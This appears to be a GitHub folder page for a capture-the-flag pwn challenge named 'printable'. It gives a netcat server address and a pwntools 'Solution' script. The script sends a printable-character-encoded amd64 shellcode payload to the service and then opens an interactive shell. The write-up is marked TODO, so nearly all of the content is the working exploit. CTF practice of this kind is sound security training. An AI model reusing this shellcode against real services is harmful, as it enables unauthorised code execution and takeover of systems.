Skip to content

Latest commit

 

History

History

printable

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 
 
 

Goals

  • Try to find the flag

Server Address

  • nc pwn.sniperoj.com 20004

Solution

#!/usr/bin/env python

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

if len(sys.argv) == 3:
    host = sys.argv[1]
    port = int(sys.argv[2])
    Io = remote(host, port)
else:
    Io = process("./pwn")

shellcode = "TX-BTUU-BTUU-BTUUP\%IIII%0000-&%%%-%%%%-%%%%P%IIII%0000-+%%%-+%%%-*%%%P%IIII%0000-1(^e-1'^e-0'`gP%IIII%0000-3F52-3E42-2E42P%IIII%0000-FF/3-FE/2-EE.2P%IIII%0000-oQ:3-pQ:2-qQ:2P%IIII%0000-EgW^-EgW_-EhY`PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP"
payload = shellcode
Io.sendline(payload)
Io.interactive()

Writeups

  • TODO

版权

该题目复现环境尚未取得主办方及出题人相关授权,如果侵权,请联系本人删除(wangyihanger@gmail.com